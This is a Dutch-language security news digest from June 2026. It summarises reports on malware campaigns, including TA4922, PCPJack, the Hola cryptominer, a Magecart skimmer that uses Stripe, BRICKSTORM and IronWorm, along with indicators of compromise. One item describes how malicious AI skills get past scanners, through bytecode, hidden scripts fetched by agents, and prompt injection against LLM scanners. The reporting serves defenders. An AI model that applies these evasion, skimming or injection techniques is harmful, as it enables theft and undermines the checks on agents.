De malware-toolkit van de groep is ook uitgebreid. Proofpoint rapporteerde het gebruik van varianten van ValleyRAT, ook bekend als Winos4.0, Atlas RAT, RomulusLoader en SilentRunLoader. Elke tool speelt een andere rol, van het verkrijgen van externe toegang tot het laden van verdere payloads of het stelen van browsergegevens. SilentRunLoader, een nieuwere Python-gebaseerde stealer en loader, is waarschijnlijk ontwikkeld met behulp van grote taalmodellen (LLM's). Het is een van de meest opvallende toevoegingen aan de toolkit van TA4922, omdat het gericht is op gegevens die zijn opgeslagen in Google Chrome. Proofpoint stelt dat de malware opgeslagen inloggegevens, cookies en browse-informatie kan verzamelen voordat de gegevens naar door aanvallers beheerde infrastructuur worden verzonden. In de Britse campagne met belastingthema werd de malware gehost via MediaFire en geleverd via links in e-mails.
TA4922 heeft ook gebruikgemaakt van DLL sideloading, een techniek waarbij een kwaadaardig bestand wordt geladen door een legitiem uitvoerbaar bestand. Voor een slachtoffer kan het bestand deel lijken uit te maken van een normaal documentpakket of een bedrijfsapplicatie. In de praktijk kan het malware starten, terwijl de activiteit moeilijker op te sporen is tijdens routinematige scans. Een ander onderdeel van de modus operandi van de groep is het gebruik van legitieme tools voor extern beheer zoals AnyDesk en SyncFuture. Deze producten hebben geldige zakelijke toepassingen, maar aanvallers kunnen ze misbruiken nadat ze toegang hebben verkregen, waardoor ze systemen kunnen beheren terwijl hun activiteit minder duidelijk kwaadaardig lijkt.
Proofpoint schatte ook met grote zekerheid in dat een deel van de nieuwere malware voor Python van TA4922 waarschijnlijk is ontwikkeld met behulp van grote taalmodellen. Onderzoekers wezen op codecommentaar, strings en ongewijzigde placeholderwaarden als tekenen dat de actor mogelijk AI tools gebruikt om sneller malware te produceren. Proofpoint's rapport stelt dat de actor financieel gemotiveerd lijkt, met activiteiten gericht op externe toegang, gegevensdiefstal, fraude, doorverkopen van toegang of persistente toegang. Hoewel sommige tools van TA4922 overeenkomsten vertonen met die gebruikt in spionagezaken, behandelt Proofpoint de groep als een aparte cybercrime-operatie. De uitbreiding van de groep naar het Verenigd Koninkrijk en andere regio's toont aan dat campagnes die ooit geconcentreerd waren in Oost-Azië, nu een directe zorg worden voor meer internationale organisaties. Organisaties moeten zich bewust zijn van cyberaanvallen met een administratief thema, waarbij belastingaangiftes, loonlijsten, uitkeringsberichten en complianceverzoeken op het eerste gezicht gewoon kunnen lijken, maar een nuttige dekmantel vormen voor aanvallers.
Bron: Proofpoint | Bron 2: hexastrike.com
04 juni 2026 | Google introduceert Android-beveiliging tegen AI deepfake scam-oproepen
Google heeft een nieuwe beveiligingsfunctie voor Android geïntroduceerd, genaamd "fake call detection", die is ontworpen om telefoongesprekken te detecteren en te markeren waarbij cybercriminelen gebruikmaken van kunstmatige intelligentie om persoonlijke contacten van gebruikers te imiteren. De functie wordt deze maand wereldwijd uitgerold naar apparaten met Android 12 en hoger, beginnend met Pixel-toestellen, en zal standaard zijn ingeschakeld.
De 'fake call detection' werkt automatisch wanneer zowel de beller als de ontvanger de telefoonapplicatie van Google gebruiken. Zodra een contact een oproep plaatst, stuurt diens apparaat in realtime een stil, versleuteld bevestigingssignaal naar het apparaat van de ontvanger. Als dit signaal ontbreekt, wat kan duiden op spoofing, zal het apparaat van de ontvanger ter verificatie contact opnemen met de daadwerkelijke telefoon van het contact. Indien het apparaat van het contact bevestigt geen oproep te plaatsen, ontvangt de ontvanger direct een waarschuwing op het scherm met het advies om op te hangen. Deze proactieve melding is bedoeld om te voorkomen dat gebruikers slachtoffer worden van deepfake-imitatie en call spoofing.
De nieuwe beveiligingsfunctie is gebaseerd op de open standaard voor Rich Communication Services (RCS) en functioneert uitsluitend op Android-apparaten waarop de apps Telefoon van Google, Contacten en Berichten van Google (met ingeschakelde RCS) zijn geïnstalleerd. Google stelt dat deze functie twee veelvoorkomende fraudetactieken aanpakt: het spoofen van het telefoonnummer van een bekend contact en het gelijktijdig gebruiken van AI-stemkloneringstechnologie om de stem van die persoon na te bootsen.
De U.S. Federal Trade Commission (FTC) waarschuwde vorig jaar dat de gerapporteerde verliezen door impersonatie-scams in 2024 alleen al $2,95 miljard bedroegen. Het Global Financial Fraud Threat Assessment van INTERPOL uit maart 2026 identificeerde fraude via impersonatie als een van de belangrijkste dreigingen die vorig jaar wereldwijd bijdroegen aan meer dan $440 miljard aan verliezen. Google benadrukt dat, hoewel mensen jarenlang vertrouwden op nummerweergave om te weten wie er aan de lijn was, dit door de nieuwe tactieken van oplichters niet langer afdoende is. Gebruikers die een andere telefoonapplicatie gebruiken, kunnen de Telefoon van Google app vanuit de Play Store installeren en deze als standaard instellen om zich beter te beschermen tegen valse oproepen.
In december heeft Google ook de ondersteuning voor Android-bescherming tegen scam-oproepen tijdens gesprekken uitgebreid naar diverse banken en financiële apps in de Verenigde Staten, waaronder Cash App en de mobiele bankapp van JPMorganChase.
Bron: wiz.io | Bron 2: ftc.gov | Bron 3: interpol.int
05 juni 2026 | PCPJack kaapt 230 cloudservers voor verborgen SMTP-relaynetwerk
De dreigingsactor bekend als PCPJack heeft cloudservers, geassocieerd met Amazon Web Services (AWS), Google Cloud en Microsoft Azure, gekaapt om een verborgen SMTP-e-mailrelaynetwerk op te zetten. Dit netwerk omvat gecompromitteerde zakelijke servers in de Verenigde Staten, Europa en Azië, die stilletjes zijn omgezet in SMTP-proxies. Deze proxies zijn geverifieerd op hun e-mailrelay functionaliteit en elke vijf minuten gesynchroniseerd met een downstream ontvanger. De infrastructuur was nog actief toen deze werd ontdekt, zo meldt dreigingsinformatiebedrijf Hunt.io.
Hunt.io deed de ontdekking nadat de dreigingsactor achter de operatie twee open directory's op een command en control (C2) server (213.136.80[.]73) zonder enige authenticatie had achtergelaten. In deze directory's werden onder andere broncode, gecompileerde binaire bestanden, logs van de implementatiestatus, internetscanners, exploitatie tools en een live Sliver configuratie aangetroffen.
PCPJack kwam voor het eerst aan het licht in april 2026, toen SentinelOne een framework voor het stelen van inloggegevens identificeerde dat specifiek gericht was op clouddiensten. Opvallend was dat PCPJack maatregelen nam om processen of artefacten van TeamPCP te beëindigen en te verwijderen, een andere bekende hackergroep die recent aandacht trok met aanvallen op softwaretoeleveringsketens.
Een van de open directory's bevatte een met Sliver geïntegreerde SMTP-proxy-implementatie toolkit, samen met Chisel tunneling en proxy binaire bestanden voor de meeste Linux CPU-architecturen, zoals AMD64, ARM64 en x86. Aan de slachtofferkant wordt het binaire bestand gedropt als een verborgen bestand met een punt als voorvoegsel en blijft het bestaan op "/var/tmp/.xs."
Verder werden in de directory's deployer scripts gevonden. Deze scripts zijn ontworpen om de Sliver C2 client configuratie te laden en te filteren op Linux beacons die binnen de laatste tien minuten hebben ingecheckt. Beacons zijn implantaten die periodiek contact opnemen met de C2 server om te controleren op commando's. Elke beacon ontvangt een SOCKS5-proxy poort die deterministisch is afgeleid van een MD5-hash van zijn Sliver UUID, en wordt toegewezen aan het bereik 10000-14999. Dit elimineert de noodzaak voor een gedeeld poort register.
Het script is ook in staat om een SMTP-kwaliteitspoort uit te voeren die controleert op uitgaande toegang tot smtp.gmail[.]com:587. Hosts die deze controle niet doorstaan, worden overgeslagen. Dit definieert het doel van de operatie: hosts die geen e-mail kunnen doorsturen, hebben geen waarde voor deze pijplijn. Beacons worden verwerkt in batches van 50, met een wachttijd van 25 minuten na uploads en 15 minuten na uitvoeringscommando's, om langzame beacon check-ins op te vangen.
Latere versies van de deployer scripts bleken de SMTP-poort en de batch-logica te verwijderen. Ook aanwezig is een diagnostisch script dat vijf actieve beacons selecteert en hen elk een shell commando geeft dat controleert op de aanwezigheid van Chisel binaire bestanden op bekende droppaden, een lopend Chisel proces, de bereikbaarheid van poort 9000 op de C2, en de aanwezigheid van persistentie artefacten, zoals de cron-ingang of de systemd-service.
Bovendien draait de C2 server een Python script genaamd "chisel_verifier.py" als een persistent achtergrondprogramma. Dit script inventariseert elke 60 seconden actieve Chisel tunnelpoorten via `ss -tlnp`, test elke nieuwe poort op SMTP-functionaliteit en verwijdert mislukte of verloren tunnels uit de actieve pool. Geverifieerde proxies worden verrijkt met exit IP-adres, land en ASN via diensten zoals api.ipify[.]org en ip-api[.]com. De proxylijsten worden vervolgens elke vijf minuten gesynchroniseerd via het Secure Copy Protocol (SCP) naar een aparte downstream server op 38.242.204[.]245. Deze server is momenteel niet toegankelijk. Het uiteindelijke doel van de operatie is in dit stadium nog onduidelijk.
Hunt.io beschrijft de campagne als opportunistisch en stelt dat de 230-node uitkomst het waarneembare resultaat is. Of deze progressie een enkele operator weerspiegelt die herhaalt, of meerdere actoren die dezelfde infrastructuur delen, kan niet worden vastgesteld uit de teruggevonden bestanden. De geverifieerde proxylijst wordt elke vijf minuten gesynchroniseerd met die server, en iemand verbruikt deze. Of het nu voor spam, phishing of iets anders is, de infrastructuur om op schaal te leveren was duidelijk operationeel.
Bron: Hunt.io
05 juni 2026 | Dashlane: Hackers omzeilen 2FA om versleutelde wachtwoordkluizen te downloaden
Dashlane heeft bekendgemaakt dat dreigingsactoren erin geslaagd zijn om de authenticatie met twee factoren (2FA) te omzeilen via een brute-force aanval. Hierdoor konden ongeautoriseerde apparaten worden geregistreerd en versleutelde wachtwoordkluizen worden gedownload van minder dan twintig gebruikers van persoonlijke abonnementen. Een afgerond onderzoek bevestigt dat er geen bredere impact is geweest op de interne systemen van Dashlane.
De aanval begon op zondag 31 mei 2026, toen een externe dreigingsactor een brute-force campagne met hoog volume lanceerde gericht op gebruikersaccounts van Dashlane. De aanvaller concentreerde zich specifiek op de API-eindpunten voor apparaatregistratie van het platform. Hierbij werden geautomatiseerde verzoeken verstuurd om zescijferige eenmalige tokens te raden, die via e-mail of authenticator apps worden verzonden.
De geautomatiseerde beveiligingscontroles van Dashlane reageerden zoals bedoeld, wat leidde tot accountvergrendelingen bij de getroffen accounts voordat de aanval volledig werd ingedamd. De dreigingsactor maakte misbruik van het apparaatregistratieproces van Dashlane, dat wordt geactiveerd wanneer een gebruiker een nieuw apparaat, zoals een mobiele telefoon of computer, aan zijn account toevoegt.
Na succesvolle 2FA-verificatie registreert Dashlane het apparaat en downloadt automatisch een kopie van de versleutelde kluis naar dat apparaat. Door geldige zescijferige tokens voor een subset van accounts te brute-forcen, konden aanvallers het registratieproces voltooien. Dit resulteerde in de effectieve autorisatie van het apparaat en het downloaden van versleutelde kluiskopieën zonder medeweten van de accounthouder.
Minder dan twintig gebruikers van persoonlijke abonnementen kregen hun versleutelde kluizen geëxfiltreerd. Alle getroffen gebruikers zijn direct door Dashlane op de hoogte gebracht. Ondanks het downloaden van de kluizen, stelt Dashlane dat de gestolen gegevens effectief ontoegankelijk blijven. De inhoud van de kluizen wordt beschermd door het hoofdwachtwoord van de gebruiker, dat nooit in platte tekst naar Dashlane servers wordt verzonden en nooit wordt opgeslagen. Dit is een kernprincipe van Dashlane's zero-knowledge architectuur.
De versleutelingsstack, bestaande uit Argon2 + AES-256-CBC + HMAC-SHA256, maakt het brute-forcen van het hoofdwachtwoord statistisch onhaalbaar, zelfs over langere periodes. Er is geen bewijs dat de interne infrastructuur van Dashlane op enig moment tijdens het incident is gecompromitteerd. Op 4 juni 2026 kondigde Dashlane de voltooiing van het onderzoek aan, waarbij werd bevestigd dat er geen aanvullende impact op klanten was. De herstelmaatregelen omvatten: het blokkeren van kwaadaardig verkeer op netwerkniveau, het reactiveren van opgeschorte en vergrendelde gebruikersaccounts, het implementeren van extra verificatielagen in het apparaatregistratieproces en het verharden van de beveiliging van API-eindpunten om toekomstig kwaadaardig verkeer te detecteren en te filteren. Het incident onderstreept dat zelfs robuuste wachtwoordmanagers kunnen worden aangevallen aan de authenticatieperimeter in plaats van de versleutelingslaag zelf, waardoor sterke 2FA-configuratie en hygiëne van het hoofdwachtwoord cruciale verdedigingsmechanismen zijn voor alle gebruikers.
Bron: Dashlane
05 juni 2026 | Nieuwe bypass-technieken omzeilen AI-skillscanners, creëren supply chain risico
Onderzoek heeft uitgewezen dat AI-skillscanners van platforms zoals ClawHub, Cisco en Vercel kunnen worden omzeild. Dit maakt het mogelijk voor kwaadaardige skills om te worden geüpload en verspreid via openbare marktplaatsen, wat een groeiend risico vormt voor de toeleveringsketen in ecosystemen van agents. Skills fungeren hierbij als herbruikbare componenten die code kunnen uitvoeren en het gedrag van modellen kunnen beïnvloeden.
Onderzoekers van Trail of Bits toonden aan dat aanvallers detectiemechanismen kunnen ontwijken met eenvoudige obfuscatietrucs en verpakkingstechnieken, in plaats van geavanceerde exploitatiemethoden. In een aanval gericht op ClawHub voegden de onderzoekers meer dan 100.000 nieuwe regeltekens in, waardoor kwaadaardige code buiten het inspectievenster van de scanner werd geduwd. Dit veroorzaakte truncatie in de analysepijplijn, waardoor schadelijke logica onopgemerkt bleef en geïntegreerde scan-engines, zoals Code Insight van VirusTotal, in verwarring werden gebracht.
Verder onderzoek naar de open-source skillscanner van Cisco en de skills.SH-integraties van Vercel onthulde aanvullende zwakke punten. Deze platforms zijn afhankelijk van een combinatie van statische analyse, patroonherkenning en inspectie gebaseerd op grote taalmodellen (LLM's). De onderzoekers van Trail of Bits ontdekten echter dat deze verdedigingsmechanismen kunnen worden gepasseerd wanneer kwaadaardige inhoud wordt verborgen in minder voor de hand liggende formaten, zoals gecompileerde Python-bytecode (.pyc) of bestanden gebaseerd op archieven, zoals .docx.
Een gedemonstreerde aanval betrof een ogenschijnlijk onschuldige skill voor tekstopmaak die gecompileerde Python-bytecode bevatte. Hoewel de zichtbare broncode onschadelijk leek, extraheerde de bytecode stiekem omgevingsvariabelen, wat potentiële data-exfiltratie mogelijk maakte. Omdat scanners zich voornamelijk richtten op leesbare bronbestanden, bleef de kwaadaardige payload onopgemerkt en werd deze als veilig geclassificeerd.
Een andere effectieve techniek maakte gebruik van indirecte uitvoeringspaden. Een skill instrueerde de AI-agent om operationele logica op te halen uit een document dat een verborgen script bevatte. Deze methode omzeilde zowel detectie gebaseerd op signatures als LLM-redenering, aangezien het kwaadaardige gedrag niet direct werd blootgesteld in de primaire skill-definitie.
Onderzoekers van Trail of Bits slaagden er ook in om promptinjectie te gebruiken om scanners gebaseerd op LLM's te manipuleren. In één voorbeeld vermomde een skill een configuratie van een kwaadaardig pakketregister als een standaard bedrijfsconfiguratie. Door het gedrag te presenteren als een legitieme bedrijfsvereiste, degradeerde de scanner het risico naar een lage ernst. De skill werd goedgekeurd, ondanks het potentieel om installaties van afhankelijkheden om te leiden naar infrastructuur onder controle van aanvallers.
Deze omzeilingen benadrukken fundamentele beperkingen in de huidige scanbenaderingen. Statische analyse heeft moeite met complexe of verborgen bestandsformaten, terwijl systemen gebaseerd op LLM's kunnen worden misleid door overtuigende of contextueel ingekaderde instructies. Bovendien creëren beperkingen zoals beperkte contextvensters en selectieve bestandsinspectie blinde vlekken die aanvallers herhaaldelijk kunnen exploiteren.
Het probleem wordt verergerd door de snelle groei van openbare marktplaatsen voor skills, waar gebruikers skills van derden kunnen installeren met minimale verificatie. In tegenstelling tot gecontroleerde omgevingen, geven deze platforms vaak prioriteit aan bruikbaarheid en snelheid boven strenge beveiligingscontroles, wat de blootstelling aan kwaadaardige uploads vergroot.
De onderzoekers van Trail of Bits concluderen dat geautomatiseerd scannen alleen onvoldoende is om ecosystemen van AI-skills te beveiligen. Ze bevelen aan om traditionele praktijken voor toeleveringsketenbeveiliging toe te passen, waaronder gecurateerde repositories, strikte toegangscontroles en versiepinnen. Totdat sterkere beveiligingsmaatregelen zijn ontwikkeld, wordt organisaties geadviseerd om alle openbare AI-skills als onvertrouwde code te behandelen en deze niet in gevoelige omgevingen te implementeren.
Bron: Trail of Bits
05 juni 2026 | Windows-versie Hola Browser gecompromitteerd met cryptominer
De versie van de Hola Browser voor Windows is gecompromitteerd in een aanval op de supply chain, waarbij een niet-aangegeven uitvoerbaar bestand is geleverd dat door onderzoekers is geïdentificeerd als een miner voor cryptocurrency. Deze compromittering werd ontdekt tijdens periodieke certificeringscontroles van de Hola Browser, als onderdeel van de AppEsteem certificeringstestprocedure die eerder met succes was doorlopen.
Hola is een Israëlisch bedrijf dat voornamelijk bekend staat om zijn Hola VPN, een dienst die gebruikers in staat stelt internetverkeer via de apparaten van andere gebruikers of via betaalde proxy-infrastructuur te routeren om geografische beperkingen te omzeilen en toegang te krijgen tot content uit verschillende landen. De Hola Browser is gebaseerd op Chromium en integreert functionaliteit voor VPN en proxy rechtstreeks in de browser. Het bedrijf en zijn producten hebben in het verleden kritiek gekregen vanwege ondoorzichtige praktijken voor verkeersafhandeling, die verband hielden met de exploitatie van een commerciële dienst genaamd Luminati Networks, waarbij gratis gebruikers werden omgezet in proxy's.
Tijdens de meest recente controles op de integriteit van de applicatie hebben Sophos en andere bedrijven gespecialiseerd in cybersecurity, die betrokken waren bij het evaluatieproces, een niet-aangegeven uitvoerbaar bestand met de naam ‘me.exe’ ontdekt. Dit bestand werd in sommige gevallen geïnstalleerd onder C:\Program Files\Hola\. Het bestand was niet gecertificeerd, had geen tijdstempel, was niet digitaal ondertekend, bevatte geobfusceerde code en kon naar het geheugen schrijven. Bij nader onderzoek vond Sophos aanwijzingen dat het binaire bestand een Monero cryptocurrency-miner was, inclusief tekenreeksen die wezen op de ware aard ervan.
De miner voegt een uitzonderingsregel toe voor Windows Defender, kopieert zichzelf naar Program Files als ‘HolaMonitorService.exe’, creëert een automatisch startende service voor Windows genaamd ‘hola_monitor_svc’ en wordt uitgevoerd wanneer de computer inactief is.
Hola werd door AppEsteem op de hoogte gebracht van de bevindingen en bevestigde dat het bedrijf een compromittering van de supply chain had ondergaan. Deze compromittering werd ook onafhankelijk gedetecteerd door het cybersecuritybedrijf Sygnia. Desondanks stelt de softwareleverancier dat slechts ongeveer 0,1% van zijn gebruikers is getroffen en dat er geen bewijs is van toegang tot gebruikersdata, diefstal of compromittering daarvan. Avi Raz Cohen, CEO van Hola, verzekerde: "We hebben sindsdien onze distributiepijplijn volledig herbouwd, geavanceerde verificatie van code-signing geïmplementeerd en strengere toegangscontroles en continue monitoring in onze infrastructuur geïntroduceerd. Deze maatregelen zijn ontworpen om te garanderen dat alleen aangegeven, gecertificeerde en ondertekende componenten aan onze gebruikers worden geleverd." BleepingComputer heeft contact opgenomen met Hola voor meer informatie over hoe de inbreuk heeft plaatsgevonden, wie de daders zijn en of cliënten op andere platforms ook zijn getroffen, maar heeft tot op heden geen reactie ontvangen.
Bron: Sophos | Bron 2: hubs.li
05 juni 2026 | campagne van Magecart misbruikt Stripe voor opslag gestolen creditcardgegevens
Een nieuwe campagne van Magecart maakt misbruik van de API-infrastructuur van Stripe om zowel de payload voor diefstal van creditcardgegevens als de geëxfiltreerde data van afrekenpagina's te hosten. Deze kwaadaardige activiteit is volledig afhankelijk van Google Tag Manager (GTM) en Stripe-domeinen, te weten googletagmanager.com en api.stripe.com, die door online winkels impliciet worden vertrouwd.
De nieuwe malwarefamilie is ontdekt door onderzoekers van e-commerce beveiligingsbedrijf Sansec. Zij stelden vast dat de kwaadaardige code wordt geladen vanuit een Google Tag Manager-container en wordt uitgevoerd op elke pagina die deze laadt. Volgens Sansec bewegen zowel de payload als de gestolen creditcards via api.stripe.com. Aangezien winkels dit domein standaard toestaan, glipt de skimmer langs Content Security Policy (CSP)-regels en netwerkfilters die verkeer naar een onbekend skimmerdomein anders zouden detecteren.
Google Tag Manager is een beheersysteem waarmee website-eigenaren scripts voor analyses, advertenties en tracking kunnen toevoegen en beheren zonder de broncode van de site te wijzigen. Stripe is een veelgebruikt platform voor betalingsverwerking dat door online winkels wordt ingezet voor het accepteren van creditcards, het beheren van klantbestellingen en het afhandelen van facturatie.
De kwaadaardige code is volgens Sansec ingebed in legitiem ogende GTM-containers, die activeren wanneer een klant een afrekenpagina bereikt. Vervolgens wordt de Stripe API opgeroepen voor een specifiek klantenrecord, in dit geval `cus_TfFjAAZQNOYENR`. Uit de metadata-velden van dit record leest de malware JavaScript-code die het opnieuw samenstelt en vervolgens uitvoert met `new Function()`. De creditcard-skimmer richt zich op Magento- en Adobe Commerce-afrekenpagina's en probeert betalingsgegevens (creditcardnummer, vervaldatum, CVV-code, naam van de klant), evenals factuur- en e-mailadressen en telefoonnummers vast te leggen.
De gestolen gegevens worden samengevoegd tot één string, geobfusceerd met een XOR-bewerking en lokaal opgeslagen in plaats van onmiddellijk te worden geëxfiltreerd. Het ophalen van de gegevens gebeurt via een afzonderlijke routine, die direct na het laden van een pagina en vervolgens elke minuut wordt uitgevoerd. Hierbij wordt de datablob in tweeën gesplitst, een nieuw Stripe-klantobject aangemaakt en de gestolen gegevens opgeslagen in metadata-velden. Elke gestolen betaalkaart wordt zo een nep-klantenrecord in het Stripe account van de aanvaller, waardoor Stripe als opslagbackend voor gestolen gegevens fungeert. Zodra de gegevens zijn gekopieerd, wordt het lokale bestand gewist om sporen van de aanval te elimineren en dubbele uploads te voorkomen.
Sansec heeft ook een variant van de aanval ontdekt waarbij Google Firestore, een clouddatabaseservice voor gegevensopslag en realtime-opvraging, wordt gebruikt in plaats van Stripe. In die versie van de campagne wordt de payload opgehaald uit een Firestore-document genaamd `tracking/captcha` in een project met de naam `braintree-payment-app`. De gestolen gegevens worden daar opgeslagen in een andere `localStorage`-sleutel, `_d_data_customer_`. De namen van het document en het project helpen de malware op te gaan in legitiem betaal- en botbeveiligingsverkeer. Het Stripe-klantenrecord dat de skimmer bevatte, werd naar verluidt op 24 december 2025 aangemaakt, wat suggereert dat de operatie ten minste sinds die datum actief is. Klanten kunnen zich tegen dergelijke risico's beschermen door eenmalige virtuele kaarten met ingestelde limieten te gebruiken.
Bron: Sansec | Bron 2: hubs.li
05 juni 2026 | Chinese dreigingsactor VerdantBamboo misbruikt MSP’s voor complexe aanvallen
Op 05 juni 2026 heeft Volexity details onthuld over de Chinese dreigingsactor VerdantBamboo, ook bekend als WARP PANDA of UNC5221. Deze groep is verantwoordelijk voor geavanceerde aanvallen waarbij Managed Services Providers (MSP’s) worden misbruikt om toegang te krijgen tot doelwitorganisaties. De bevindingen kwamen voort uit een incidentrespons-onderzoek dat in september 2025 startte, nadat verdacht netwerkverkeer werd waargenomen vanuit een virtuele machine op Linux-basis.
Het incident begon met een Egnyte Storage Sync systeem op het netwerk van een klant. Volexity ontdekte dat dit systeem verbinding maakte met een door de dreigingsactor beheerd domein achter IP-adressen van Cloudflare, in plaats van met een legitiem Egnyte-domein. Bovendien maakte de appliance TLS-verbindingen met Google’s publieke DNS-server (8.8.8.8) voor DNS over HTTPS-queries.
Uit analyse bleek dat VerdantBamboo het Storage Sync systeem had gecompromitteerd met behulp van de BRICKSTORM malware. Deze backdoor is eerder beschreven in rapporten van onder andere CISA, Google Cloud en NVISO. De dreigingsactor kreeg via de web SSL VPN van de slachtofferorganisatie toegang tot de appliance. Met de proxy-mogelijkheden van de malware en gestolen inloggegevens wist VerdantBamboo de Microsoft 365-omgeving (M365) van het slachtoffer te benaderen. Volexity schat met grote zekerheid in dat dit gebeurde om legitiem netwerkverkeer na te bootsen en Conditional Access-beleid te omzeilen.
Verder onderzoek toonde aan dat de initiële compromittering al minstens 18 maanden eerder had plaatsgevonden. Nadat de eerste herstelwerkzaamheden waren afgerond, keerde VerdantBamboo terug. Ze braken opnieuw in bij de slachtofferorganisatie door verbinding te maken met de firewall via gestolen administratieve inloggegevens. Deze toegang werd gebruikt om web SSL VPN-toegang in te schakelen en te configureren, waarna interne systemen werden benaderd en extra op maat gemaakte malware op een Synology NAS-apparaat werd geïmplementeerd.
Tijdens het onderzoek stelde Volexity vast dat VerdantBamboo ook de Managed Services Provider (MSP) van het slachtoffer had gecompromitteerd. Na een onderzoek van het MSP-netwerk bleek dat de pfSense-firewall van de MSP was geïnfecteerd met een BSD-variant van BRICKSTORM. Deze compromittering had eveneens minstens 18 maanden eerder plaatsgevonden. Volexity concludeert met redelijke zekerheid dat de slachtofferorganisatie indirect was gecompromitteerd via de inbraak bij de MSP.
Forensisch onderzoek van het Storage Sync systeem en de pfSense-firewall leidde tot de ontdekking van meerdere BRICKSTORM-backdoor-samples. Volexity vond later ook een BRICKSTORM-sample op een uitgeschakelde virtuele machine, een legacy Linux-gebaseerde GroupWise-server die werd gebruikt voor gearchiveerde e-mailberichten.
Naast BRICKSTORM identificeerde Volexity twee voorheen ongedocumenteerde malwarefamilies: PLENET en AGENTPSD. PLENET is geschreven in .NET Core en gecompileerd naar native code met behulp van Native AOT-functionaliteiten voor Linux systemen; Google Cloud noemde deze malware "GRIMBOLT". AGENTPSD, geschreven in Python en gecompileerd met PyInstaller, heeft beperkte functionaliteit en diende waarschijnlijk als fallback-backdoor. De aanvalsketen en de mogelijkheden van AGENTPSD, BRICKSTORM en PLENET worden uitgebreid beschreven in het rapport van Volexity.
Bron: Volexity | Bron 2: virustotal.com | Bron 3: learn.microsoft.com
05 juni 2026 | Hackers imiteren security tools voor malware via valse downloadsites
Hackers hebben overtuigende nepwebsites opgezet die populaire security tools imiteren om gebruikers te verleiden malware te downloaden. Deze sites zijn professioneel ontworpen en lijken vrijwel identiek aan de officiële projectpagina's, inclusief links naar daadwerkelijke GitHub-repositories. Echter, zodra een gebruiker op de downloadknop klikt, worden slachtoffers via een verborgen verkeersfiltersysteem, bekend als een Traffic Distribution System (TDS), omgeleid.
Dit TDS fungeert als een poortwachter en bepaalt welke gebruikers worden doorgestuurd naar malware en welke een onschadelijk bestand ontvangen. Het systeem screent op locatie, browsertype, VPN-gebruik en de mogelijke aanwezigheid van een security onderzoeker, wat detectie en identificatie van de aanval bemoeilijkt.
Analisten van Check Point Research hebben deze grootschalige campagne onderzocht en ontdekten dat de nepwebsites een JavaScript-script laden dat wordt gehost op het CloudFront-netwerk van Amazon. Dit script onderschept de eerste downloadklik en stuurt de gebruiker onzichtbaar door naar het TDS, zonder dat er zichtbaar iets ongebruikelijks gebeurt. Check Point meldt dat de operatie specifiek gericht is op tools die door security professionals worden gebruikt, waaronder Ghidra, dnSpy en SpiderFoot.
De campagne is al minstens sinds december 2025 actief, waarbij de levering van malware vanaf begin januari 2026 is bevestigd. Telemetrie van VirusTotal toont meer dan 5.000 inzendingen die gekoppeld zijn aan gerelateerde samples, en onderzoekers merken op dat de werkelijke blootstelling waarschijnlijk veel hoger is. Het feit dat de geïmiteerde tools dagelijks worden gebruikt door security onderzoekers, maakt deze campagne bijzonder zorgwekkend, aangezien het de mensen treft die getraind zijn om dergelijke bedreigingen te herkennen.
Drie verschillende malwarefamilies dienen als uiteindelijke payloads. RemusStealer is een nieuw opgedoken infostealer die data van meer dan 20 browsers steelt, waaronder cryptocurrency wallets, password managers en tools voor twee-factor authenticatie. AnimateClipper monitort stilletjes het klembord en verwisselt gekopieerde walletadressen met door aanvallers gecontroleerde adressen, waardoor mogelijk echte fondsen worden omgeleid zonder dat het slachtoffer dit merkt. Een derde payload, genaamd SessionGate, is een multi-stage loader met zware obfuscation en een eenmalige sleutellevering, wat analyse buitengewoon moeilijk maakt.
Meer dan 100 actieve nepwebsites zijn geïdentificeerd in dit cluster, die allemaal dezelfde CloudFront-gehoste scripts en campagne-identificatoren delen. Sites zoals ghidralite[.]com en dnspy[.]org verschijnen bovenaan de Google-resultaten voor relevante zoekopdrachten, wat hen een vals gevoel van autoriteit geeft. Wanneer een gebruiker de muis over de downloadknop beweegt, toont de statusbalk van de browser zelfs een echte GitHub-URL, zodat voorzichtige gebruikers mogelijk niets verkeerds opmerken. Het JavaScript dat door deze pagina's wordt geladen, luistert naar de eerste interactie van de gebruiker en onderschept deze voordat de normale navigatie kan plaatsvinden. Op Chrome legt het een mousedown-event vast; op Firefox gebruikt het een click-event. Vervolgens genereert het een TDS runtime URL, leidt de gebruiker stilzwijgend om en annuleert de oorspronkelijke navigatie volledig. Het slachtoffer belandt ergens totaal anders dan de bedoeling was, en het hele proces is onzichtbaar.
SessionGate onderscheidt zich door zijn agressieve weerstand tegen analyse. Het oorspronkelijk gedownloade bestand is een 7-Zip-archief van ongeveer 20 MB, maar het eigenlijke uitvoerbare bestand erin is slechts 15 MB, waarbij de resterende 5 MB bestaat uit geobfusceerde loadercode die is ontworpen om tools zoals de decompiler van IDA te omzeilen. Functies kunnen meer dan 500 KB groot zijn, en versleutelde strings worden in coderuimtes geplaatst om disassemblers verder te verwarren. De decryptiesleutel voor de laatste payload-fase wordt server-side gegenereerd en slechts één keer per slachtoffersessie vrijgegeven. Als een onderzoeker de keten vanaf een ander IP-adres probeert te herhalen, retourneert de server een geldig ogende maar nutteloze sleutel, waardoor de payload volledig onleesbaar wordt.
Security teams wordt sterk aangeraden om software uitsluitend van officiële projectpagina's of geverifieerde repositories te downloaden, bestands-hashes na het downloaden te verifiëren en actief uitgaande verbindingen naar de Command & Control (C2) domeinen en infrastructuur die in deze campagne zijn geïdentificeerd, te monitoren.
Bron: Check Point Research | Bron 2: research.checkpoint.com
05 juni 2026 | Nieuwe IronWorm malware infecteert 36 npm-pakketten in supply-chain aanval
Een nieuwe aanval op de supply chain heeft 36 pakketten in de Node Package Manager (npm) index geïnfecteerd met de infostealer malware genaamd IronWorm. Deze malware, geschreven in Rust, is ontworpen om 86 omgevingsvariabelen en 20 credential-bestanden te stelen. Hieronder vallen onder andere OpenAI-, AWS-, Anthropic- en npm-referenties, configuratiebestanden van vaults, SSH-sleutels en Exodus cryptocurrency wallet-bestanden.
